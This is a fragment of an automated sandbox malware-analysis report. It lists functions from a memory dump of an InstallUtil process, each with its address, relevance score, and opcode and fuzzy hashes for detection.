                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66d74ce4148304798c4ab2f6b5ffafee8e14dac51673deaab64a88d7189cef33
                                                        • Instruction ID: 80101b1731ab2b8a76aa441ccdfc569e6cf4a8b9dfad402bc0b0e862d2a1a698
                                                        • Opcode Fuzzy Hash: 66d74ce4148304798c4ab2f6b5ffafee8e14dac51673deaab64a88d7189cef33
                                                        • Instruction Fuzzy Hash: 75210571B442158FCB169F64E444BAB3BA2FBC9311F108429F849CB292CB74CD16CBD1
                                                        Function 00AAD60F Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 90a232738fe1c088289a24194332b2f5ec026cf78395de834fb6fc6dbd4e43b3
                                                        • Instruction ID: 80109afd602e65e2b8bf1effb9328b705c9bbe571211d8fda926de9561dc33a2
                                                        • Opcode Fuzzy Hash: 90a232738fe1c088289a24194332b2f5ec026cf78395de834fb6fc6dbd4e43b3
                                                        • Instruction Fuzzy Hash: 9B115E71E442098FDB09DFAAD8456DEBBF2ABC9310F14D029D415BB295DB3884478E90
                                                        Function 00AAE1F8 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af5cc3b2e46edc3dc52b671a46d8fe61bc7a6f7a5b09854dd5379f9d3dbd6450
                                                        • Instruction ID: 7605c052a79a300d2b5f66097b46f78ce6d67f423cec8e7449c83f00de7601ff
                                                        • Opcode Fuzzy Hash: af5cc3b2e46edc3dc52b671a46d8fe61bc7a6f7a5b09854dd5379f9d3dbd6450
                                                        • Instruction Fuzzy Hash: B8219FB0E052099FDB45EFB8D94079EBFF1FB45300F00D5AAD014AB265EB305A46DB82
                                                        Function 00AA5A70 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c210310dd77bc6c7b15fd2b0ec473fb30d6cda97a0d096157b012e87c1aa06a0
                                                        • Instruction ID: 15e5a495803111e2282df461a0f879e1942ddac0b99c7d75a568db2d6c36da73
                                                        • Opcode Fuzzy Hash: c210310dd77bc6c7b15fd2b0ec473fb30d6cda97a0d096157b012e87c1aa06a0
                                                        • Instruction Fuzzy Hash: 3911A531B00A228FD7195B39D49892EB7A6FFC57917154678E906CB391DF20DC0287D4
                                                        Function 00AAE208 Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b5872556f1b22cd40d4ec303d7347aa21b206fd5e396e05dd91a34507899cde4
                                                        • Instruction ID: 0693b5222c46a61eb786b25bd46f2bc43be4fb12db4918bbe52cabf351f5cd53
                                                        • Opcode Fuzzy Hash: b5872556f1b22cd40d4ec303d7347aa21b206fd5e396e05dd91a34507899cde4
                                                        • Instruction Fuzzy Hash: 7E112EB0E011099FDB54EFB9D940B9EBBF1FB45300F40D5AAD014AB365EB705A859BC1
                                                        Function 00AA5607 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1945ddc0968daca344bb08e55fedc11bbefb5995a6e092c5484e7f0947637c86
                                                        • Instruction ID: 58efee4ed7f5505c2e6643a0ec2bccd9992b652a078d08d33cf935d6010585aa
                                                        • Opcode Fuzzy Hash: 1945ddc0968daca344bb08e55fedc11bbefb5995a6e092c5484e7f0947637c86
                                                        • Instruction Fuzzy Hash: CE01B172F001246FCB05DE64A804BAF7BA7EFC9751F28802EFA05D7281CB72C8128795
                                                        Function 00AAD449 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cde19679421c97b7d2fdacc2467a1086664bf293cbb3f397d833a2b823e7eb4
                                                        • Instruction ID: 32423e5c73315fdc397929f9c17fa3f993ace8c5b04da30037c452186f0ef682
                                                        • Opcode Fuzzy Hash: 6cde19679421c97b7d2fdacc2467a1086664bf293cbb3f397d833a2b823e7eb4
                                                        • Instruction Fuzzy Hash: 3CF02330EC91168FE706D765AC155ED7770D786310F00503DC001DB5D1C774C5478680
                                                        Function 00AADEB0 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c353bacce836d1bad302e8d8466fee9fa1513230aa0cbd820c77e6e888cbce1a
                                                        • Instruction ID: b75f2b298d4e553518a0b18dee74eadab782c39fa479bf959986d535e4bd5e51
                                                        • Opcode Fuzzy Hash: c353bacce836d1bad302e8d8466fee9fa1513230aa0cbd820c77e6e888cbce1a
                                                        • Instruction Fuzzy Hash: C3F03471A11225CFCB94EFBCC444AAE7BF0AF0D210B2144A9D40ADB760EB30DE008BD0
                                                        Function 00AAD4B4 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8613629205a1b7a9ca66efb23e0c4dd7233373a2f78844782e1cf07de1b5567b
                                                        • Instruction ID: 0b73dde09af05b5fe95f6bfcf522fe64ab4e023f166c26ed6cfe5eef855db206
                                                        • Opcode Fuzzy Hash: 8613629205a1b7a9ca66efb23e0c4dd7233373a2f78844782e1cf07de1b5567b
                                                        • Instruction Fuzzy Hash: 75E026E2C0D150CBD3108BAAA8260B9BF30DDEB31174460C7D0CACB9B1E728E606EB11
                                                        Function 00AA2010 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 786f9230047a2ff71111f896bee9628746a4ccebca575e101c05058ace554a53
                                                        • Instruction ID: e3f152770791e9a84298426ed533e936a4bac1962910076c5c0b4e2376e74648
                                                        • Opcode Fuzzy Hash: 786f9230047a2ff71111f896bee9628746a4ccebca575e101c05058ace554a53
                                                        • Instruction Fuzzy Hash: B0E06131C2435BDBCF00AB64EC044DEBF34EE83220F515567E0502B001EB301549C3A2
                                                        Function 00AA2020 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 042adc405e769b2c07536b3394a5b04bfe82e4e6a4a55c5681a1fd45e23e8991
                                                        • Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
                                                        • Opcode Fuzzy Hash: 042adc405e769b2c07536b3394a5b04bfe82e4e6a4a55c5681a1fd45e23e8991
                                                        • Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0
                                                        Function 00AA8258 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                        • Instruction ID: 7b70ad74fe4c3957d9652122d94484bb3f4d22ab7d45bd40c99ce57e810d3ca5
                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                        • Instruction Fuzzy Hash: 1EC0127320C1282AAA28108F7C44AB3AB8CC6C27B4A25013BF96CA7280A9469C8001B8
                                                        Function 00AAA70D Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8580d1ee04af391c38b865ce81a8359c6933e2dc5a93e97301cc1f351ea06c47
                                                        • Instruction ID: 3d197c47deab6b25324b11d8d30bf79ef8631cd4f9edededc5258d8ee6d636e3
                                                        • Opcode Fuzzy Hash: 8580d1ee04af391c38b865ce81a8359c6933e2dc5a93e97301cc1f351ea06c47
                                                        • Instruction Fuzzy Hash: 77D0677BB410189FCB049F98E8808DDB7B6FB9C221B048516EA15A3261C6319921DB50
                                                        Function 00AA5EA8 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2355eb872a40e34a8190eafa28f92bfc0ab64861ace1dffd85bc1f32c1b96fcf
                                                        • Instruction ID: 6b27f7b66c20988d83c2f98f62b95946e7a300806ee47bf1e6e62691c9cbddc8
                                                        • Opcode Fuzzy Hash: 2355eb872a40e34a8190eafa28f92bfc0ab64861ace1dffd85bc1f32c1b96fcf
                                                        • Instruction Fuzzy Hash: AFD02BB09083864FC726F730E89A4A83F32EB80308F44D6E8F84119157ED75084F8B16
                                                        Function 00AA9050 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 090d2e284a32a3c46e0286f1a57f3a8911fdedfb21dcd1294ee30ae605a328be
                                                        • Instruction ID: 8dd5d9fc01b99453a759ba64ad585e8523119ecd957e9e79272d979ee5cb1755
                                                        • Opcode Fuzzy Hash: 090d2e284a32a3c46e0286f1a57f3a8911fdedfb21dcd1294ee30ae605a328be
                                                        • Instruction Fuzzy Hash: D8D0C96058E7D22EEF0B43340D6689A3FA08C1321030945D7D4D0CF1E3C208950BC326
                                                        Function 00AA5EB8 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c7ea9f8ce3bab6cfbb99015e825e621fabdd66ce0289e792e3ccafbb8c938f9
                                                        • Instruction ID: 4deb6a1db4a5e1c1482d5c82870539b14aab656e73e3176b2577b59a9ca03ef1
                                                        • Opcode Fuzzy Hash: 1c7ea9f8ce3bab6cfbb99015e825e621fabdd66ce0289e792e3ccafbb8c938f9
                                                        • Instruction Fuzzy Hash: 5AC0C07050030D0FC209FB30F985A243B5BF7C0304F80DE54F1091D14ADE7818880393